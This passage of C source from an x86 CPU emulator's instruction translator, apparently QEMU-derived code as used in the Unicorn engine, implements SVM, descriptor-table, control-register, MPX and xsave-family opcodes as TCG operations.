gen_helper_mwait(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); gen_eob(s); break; case 0xca: /* clac */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || s->cpl != 0) { goto illegal_op; } gen_helper_clac(tcg_ctx, tcg_ctx->cpu_env); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xcb: /* stac */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || s->cpl != 0) { goto illegal_op; } gen_helper_stac(tcg_ctx, tcg_ctx->cpu_env); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; CASE_MODRM_MEM_OP(1): /* sidt */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_IDTR_READ); gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.limit)); gen_op_st_v(s, MO_16, s->T0, s->A0); gen_add_A0_im(s, 2); tcg_gen_ld_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.base)); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } gen_op_st_v(s, CODE64(s) + MO_32, s->T0, s->A0); break; case 0xd0: /* xgetbv */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (s->prefix & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_xgetbv(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s->tmp2_i32); tcg_gen_extr_i64_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->tmp1_i64); break; case 0xd1: /* xsetbv */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (s->prefix & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, 
tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_xsetbv(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->tmp1_i64); /* End TB because translation flags may change. */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xd8: /* VMRUN */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmrun(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1), tcg_const_i32(tcg_ctx, s->pc - pc_start)); tcg_gen_exit_tb(tcg_ctx, NULL, 0); s->base.is_jmp = DISAS_NORETURN; break; case 0xd9: /* VMMCALL */ if (!(s->flags & HF_SVME_MASK)) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmmcall(tcg_ctx, tcg_ctx->cpu_env); break; case 0xda: /* VMLOAD */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmload(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); break; case 0xdb: /* VMSAVE */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_vmsave(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); break; case 0xdc: /* STGI */ if ((!(s->flags & HF_SVME_MASK) && !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_helper_stgi(tcg_ctx, tcg_ctx->cpu_env); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xdd: /* CLGI */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_clgi(tcg_ctx, tcg_ctx->cpu_env); break; case 0xde: /* SKINIT */ if ((!(s->flags & HF_SVME_MASK) && !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || !s->pe) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_skinit(tcg_ctx, tcg_ctx->cpu_env); break; case 0xdf: /* INVLPGA */ if (!(s->flags & HF_SVME_MASK) || !s->pe) { goto illegal_op; } if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_invlpga(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); break; CASE_MODRM_MEM_OP(2): /* lgdt */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_svm_check_intercept(s, pc_start, SVM_EXIT_GDTR_WRITE); gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_16, s->T1, s->A0); gen_add_A0_im(s, 2); gen_op_ld_v(s, CODE64(s) + MO_32, s->T0, s->A0); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.base)); tcg_gen_st32_tl(tcg_ctx, s->T1, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.limit)); break; CASE_MODRM_MEM_OP(3): /* lidt */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_svm_check_intercept(s, pc_start, SVM_EXIT_IDTR_WRITE); gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_16, s->T1, s->A0); gen_add_A0_im(s, 2); 
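/* Pseudo-descriptor layout: the 16-bit limit was read above from offset 0 and the base is read below from offset 2; with a 16-bit operand size only the low 24 bits of the base are kept. */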
gen_op_ld_v(s, CODE64(s) + MO_32, s->T0, s->A0); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.base)); tcg_gen_st32_tl(tcg_ctx, s->T1, tcg_ctx->cpu_env, offsetof(CPUX86State, idt.limit)); break; CASE_MODRM_OP(4): /* smsw */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_CR0); tcg_gen_ld_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, cr[0])); if (CODE64(s)) { mod = (modrm >> 6) & 3; ot = (mod != 3 ? MO_16 : s->dflag); } else { ot = MO_16; } gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 0xee: /* rdpkru */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_rdpkru(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s->tmp2_i32); tcg_gen_extr_i64_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->tmp1_i64); break; case 0xef: /* wrpkru */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_ECX]); gen_helper_wrpkru(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->tmp1_i64); break; CASE_MODRM_OP(6): /* lmsw */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); gen_helper_lmsw(tcg_ctx, tcg_ctx->cpu_env, s->T0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; CASE_MODRM_MEM_OP(7): /* invlpg */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); break; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_lea_modrm(env, s, modrm); gen_helper_invlpg(tcg_ctx, tcg_ctx->cpu_env, s->A0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; case 0xf8: /* swapgs */ #ifdef TARGET_X86_64 if (CODE64(s)) { if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { tcg_gen_mov_tl(tcg_ctx, s->T0, tcg_ctx->cpu_seg_base[R_GS]); tcg_gen_ld_tl(tcg_ctx, tcg_ctx->cpu_seg_base[R_GS], tcg_ctx->cpu_env, offsetof(CPUX86State, kernelgsbase)); tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, kernelgsbase)); } break; } #endif goto illegal_op; case 0xf9: /* rdtscp */ if (!(s->cpuid_ext2_features & CPUID_EXT2_RDTSCP)) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdtscp(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; default: goto unknown_op; } break; case 0x108: /* invd */ case 0x109: /* wbinvd */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, (b & 2) ? 
SVM_EXIT_INVD : SVM_EXIT_WBINVD); /* nothing to do */ } break; case 0x63: /* arpl or movslS (x86_64) */ #ifdef TARGET_X86_64 if (CODE64(s)) { int d_ot; /* d_ot is the size of destination */ d_ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod == 3) { gen_op_mov_v_reg(s, MO_32, s->T0, rm); /* sign extend */ if (d_ot == MO_64) { tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); } gen_op_mov_reg_v(s, d_ot, reg, s->T0); } else { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, MO_32 | MO_SIGN, s->T0, s->A0); gen_op_mov_reg_v(s, d_ot, reg, s->T0); } } else #endif { TCGLabel *label1; TCGv t0, t1, t2, a0; if (!s->pe || s->vm86) goto illegal_op; t0 = tcg_temp_local_new(tcg_ctx); t1 = tcg_temp_local_new(tcg_ctx); t2 = tcg_temp_local_new(tcg_ctx); ot = MO_16; modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; rm = modrm & 7; if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, t0, s->A0); a0 = tcg_temp_local_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, a0, s->A0); } else { gen_op_mov_v_reg(s, ot, t0, rm); a0 = NULL; } gen_op_mov_v_reg(s, ot, t1, reg); tcg_gen_andi_tl(tcg_ctx, s->tmp0, t0, 3); tcg_gen_andi_tl(tcg_ctx, t1, t1, 3); tcg_gen_movi_tl(tcg_ctx, t2, 0); label1 = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, s->tmp0, t1, label1); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_movi_tl(tcg_ctx, t2, CC_Z); gen_set_label(tcg_ctx, label1); if (mod != 3) { gen_op_st_v(s, ot, t0, a0); tcg_temp_free(tcg_ctx, a0); } else { gen_op_mov_reg_v(s, ot, rm, t0); } gen_compute_eflags(s); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, ~CC_Z); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } break; case 0x102: /* lar */ case 0x103: /* lsl */ { TCGLabel *label1; TCGv t0; if (!s->pe || s->vm86) goto illegal_op; ot = dflag != MO_16 ? 
MO_32 : MO_16; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); t0 = tcg_temp_local_new(tcg_ctx); gen_update_cc_op(s); if (b == 0x102) { gen_helper_lar(tcg_ctx, t0, tcg_ctx->cpu_env, s->T0); } else { gen_helper_lsl(tcg_ctx, t0, tcg_ctx->cpu_env, s->T0); } tcg_gen_andi_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, CC_Z); label1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, s->tmp0, 0, label1); gen_op_mov_reg_v(s, ot, reg, t0); gen_set_label(tcg_ctx, label1); set_cc_op(s, CC_OP_EFLAGS); tcg_temp_free(tcg_ctx, t0); } break; case 0x118: modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; op = (modrm >> 3) & 7; switch(op) { case 0: /* prefetchnta */ case 1: /* prefetchnt0 */ case 2: /* prefetchnt0 */ case 3: /* prefetchnt0 */ if (mod == 3) goto illegal_op; gen_nop_modrm(env, s, modrm); /* nothing more to do */ break; default: /* nop (multi byte) */ gen_nop_modrm(env, s, modrm); break; } break; case 0x11a: modrm = x86_ldub_code(env, s); if (s->flags & HF_MPX_EN_MASK) { mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; if (prefixes & PREFIX_REPZ) { /* bndcl */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } gen_bndck(env, s, modrm, TCG_COND_LTU, tcg_ctx->cpu_bndl[reg]); } else if (prefixes & PREFIX_REPNZ) { /* bndcu */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } TCGv_i64 notu = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, notu, tcg_ctx->cpu_bndu[reg]); gen_bndck(env, s, modrm, TCG_COND_GTU, notu); tcg_temp_free_i64(tcg_ctx, notu); } else if (prefixes & PREFIX_DATA) { /* bndmov -- from reg/mem */ if (reg >= 4 || s->aflag == MO_16) { goto illegal_op; } if (mod == 3) { int reg2 = (modrm & 7) | REX_B(s); if (reg2 >= 4 || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if (s->flags & HF_MPX_IU_MASK) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndl[reg2]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], tcg_ctx->cpu_bndu[reg2]); } } else { gen_lea_modrm(env, s, modrm); if (CODE64(s)) { tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEQ); } else { tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 4); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEUL); } /* bnd registers are now in-use */ gen_set_hflag(s, HF_MPX_IU_MASK); } } else if (mod != 3) { /* bndldx */ AddressParts a = gen_lea_modrm_0(env, s, modrm); if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16 || a.base < -1) { goto illegal_op; } if (a.base >= 0) { tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[a.base], a.disp); } else { tcg_gen_movi_tl(tcg_ctx, s->A0, 0); } gen_lea_v_seg(s, s->aflag, s->A0, a.def_seg, s->override); if (a.index >= 0) { tcg_gen_mov_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[a.index]); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, 0); } if (CODE64(s)) { gen_helper_bndldx64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_env, s->A0, s->T0); tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], tcg_ctx->cpu_env, offsetof(CPUX86State, mmx_t0.MMX_Q(0))); } else { gen_helper_bndldx32(tcg_ctx, tcg_ctx->cpu_bndu[reg], tcg_ctx->cpu_env, s->A0, s->T0); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndu[reg]); tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], 
tcg_ctx->cpu_bndu[reg], 32); } gen_set_hflag(s, HF_MPX_IU_MASK); } } gen_nop_modrm(env, s, modrm); break; case 0x11b: modrm = x86_ldub_code(env, s); if (s->flags & HF_MPX_EN_MASK) { mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; if (mod != 3 && (prefixes & PREFIX_REPZ)) { /* bndmk */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } AddressParts a = gen_lea_modrm_0(env, s, modrm); if (a.base >= 0) { tcg_gen_extu_tl_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_regs[a.base]); if (!CODE64(s)) { tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndl[reg]); } } else if (a.base == -1) { /* no base register has lower bound of 0 */ tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], 0); } else { /* rip-relative generates #ud */ goto illegal_op; } tcg_gen_not_tl(tcg_ctx, s->A0, gen_lea_modrm_1(s, a)); if (!CODE64(s)) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, s->A0); } tcg_gen_extu_tl_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0); /* bnd registers are now in-use */ gen_set_hflag(s, HF_MPX_IU_MASK); break; } else if (prefixes & PREFIX_REPNZ) { /* bndcn */ if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16) { goto illegal_op; } gen_bndck(env, s, modrm, TCG_COND_GTU, tcg_ctx->cpu_bndu[reg]); } else if (prefixes & PREFIX_DATA) { /* bndmov -- to reg/mem */ if (reg >= 4 || s->aflag == MO_16) { goto illegal_op; } if (mod == 3) { int reg2 = (modrm & 7) | REX_B(s); if (reg2 >= 4 || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if (s->flags & HF_MPX_IU_MASK) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg2], tcg_ctx->cpu_bndl[reg]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg2], tcg_ctx->cpu_bndu[reg]); } } else { gen_lea_modrm(env, s, modrm); if (CODE64(s)) { tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 8); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEQ); } else { tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndl[reg], s->A0, s->mem_index, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, 4); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_bndu[reg], s->A0, s->mem_index, MO_LEUL); } } } else if (mod != 3) { /* bndstx */ AddressParts a = gen_lea_modrm_0(env, s, modrm); if (reg >= 4 || (prefixes & PREFIX_LOCK) || s->aflag == MO_16 || a.base < -1) { goto illegal_op; } if (a.base >= 0) { tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[a.base], a.disp); } else { tcg_gen_movi_tl(tcg_ctx, s->A0, 0); } gen_lea_v_seg(s, s->aflag, s->A0, a.def_seg, s->override); if (a.index >= 0) { tcg_gen_mov_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[a.index]); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, 0); } if (CODE64(s)) { gen_helper_bndstx64(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->T0, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndu[reg]); } else { gen_helper_bndstx32(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->T0, tcg_ctx->cpu_bndl[reg], tcg_ctx->cpu_bndu[reg]); } } } gen_nop_modrm(env, s, modrm); break; case 0x119: case 0x11c: /* nop (multi byte) */ case 0x11d: /* nop (multi byte) */ case 0x11e: /* nop (multi byte) */ case 0x11f: /* nop (multi byte) */ modrm = x86_ldub_code(env, s); gen_nop_modrm(env, s, modrm); break; case 0x120: /* mov reg, crN */ case 0x122: /* mov crN, reg */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { modrm = x86_ldub_code(env, s); /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). 
* AMD documentation (24594.pdf) and testing of * intel 386 and 486 processors all show that the mod bits * are assumed to be 1's, regardless of actual values. */ rm = (modrm & 7) | REX_B(s); reg = ((modrm >> 3) & 7) | rex_r; if (CODE64(s)) ot = MO_64; else ot = MO_32; if ((prefixes & PREFIX_LOCK) && (reg == 0) && (s->cpuid_ext3_features & CPUID_EXT3_CR8LEG)) { reg = 8; } switch(reg) { case 0: case 2: case 3: case 4: case 8: gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (b & 2) { if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_op_mov_v_reg(s, ot, s->T0, rm); gen_helper_write_crN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, reg), s->T0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } else { if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_read_crN(tcg_ctx, s->T0, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, reg)); gen_op_mov_reg_v(s, ot, rm, s->T0); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } } break; default: goto unknown_op; } } break; case 0x121: /* mov reg, drN */ case 0x123: /* mov drN, reg */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { modrm = x86_ldub_code(env, s); /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). * AMD documentation (24594.pdf) and testing of * intel 386 and 486 processors all show that the mod bits * are assumed to be 1's, regardless of actual values. */ rm = (modrm & 7) | REX_B(s); reg = ((modrm >> 3) & 7) | rex_r; if (CODE64(s)) ot = MO_64; else ot = MO_32; if (reg >= 8) { goto illegal_op; } if (b & 2) { gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_DR0 + reg); gen_op_mov_v_reg(s, ot, s->T0, rm); tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, reg); gen_helper_set_dr(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T0); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_DR0 + reg); tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, reg); gen_helper_get_dr(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->tmp2_i32); gen_op_mov_reg_v(s, ot, rm, s->T0); } } break; case 0x106: /* clts */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); gen_helper_clts(tcg_ctx, tcg_ctx->cpu_env); /* abort block because static cpu state changed */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; /* MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4 support */ case 0x1c3: /* MOVNTI reg, mem */ if (!(s->cpuid_features & CPUID_SSE2)) goto illegal_op; ot = mo_64_32(dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; reg = ((modrm >> 3) & 7) | rex_r; /* generate a generic store */ gen_ldst_modrm(env, s, modrm, ot, reg, 1); break; case 0x1ae: modrm = x86_ldub_code(env, s); switch (modrm) { CASE_MODRM_MEM_OP(0): /* fxsave */ if (!(s->cpuid_features & CPUID_FXSR) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); gen_helper_fxsave(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; CASE_MODRM_MEM_OP(1): /* fxrstor */ if (!(s->cpuid_features & CPUID_FXSR) || (prefixes & PREFIX_LOCK)) { goto illegal_op; } if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); gen_helper_fxrstor(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; CASE_MODRM_MEM_OP(2): /* ldmxcsr */ if ((s->flags & HF_EM_MASK) || 
!(s->flags & HF_OSFXSR_MASK)) { goto illegal_op; } if (s->flags & HF_TS_MASK) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_ldmxcsr(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; CASE_MODRM_MEM_OP(3): /* stmxcsr */ if ((s->flags & HF_EM_MASK) || !(s->flags & HF_OSFXSR_MASK)) { goto illegal_op; } if (s->flags & HF_TS_MASK) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, mxcsr)); gen_op_st_v(s, MO_32, s->T0, s->A0); break; CASE_MODRM_MEM_OP(4): /* xsave */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (prefixes & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } gen_lea_modrm(env, s, modrm); tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); gen_helper_xsave(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp1_i64); break; CASE_MODRM_MEM_OP(5): /* xrstor */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (prefixes & (PREFIX_LOCK | PREFIX_DATA | PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } gen_lea_modrm(env, s, modrm); tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); gen_helper_xrstor(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp1_i64); /* XRSTOR is how MPX is enabled, which changes how we translate. Thus we need to end the TB. */ gen_update_cc_op(s); gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); break; CASE_MODRM_MEM_OP(6): /* xsaveopt / clwb */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } if (prefixes & PREFIX_DATA) { /* clwb */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_CLWB)) { goto illegal_op; } gen_nop_modrm(env, s, modrm); } else { /* xsaveopt */ if ((s->cpuid_ext_features & CPUID_EXT_XSAVE) == 0 || (s->cpuid_xsave_features & CPUID_XSAVE_XSAVEOPT) == 0 || (prefixes & (PREFIX_REPZ | PREFIX_REPNZ))) { goto illegal_op; } gen_lea_modrm(env, s, modrm); tcg_gen_concat_tl_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX]); gen_helper_xsaveopt(tcg_ctx, tcg_ctx->cpu_env, s->A0, 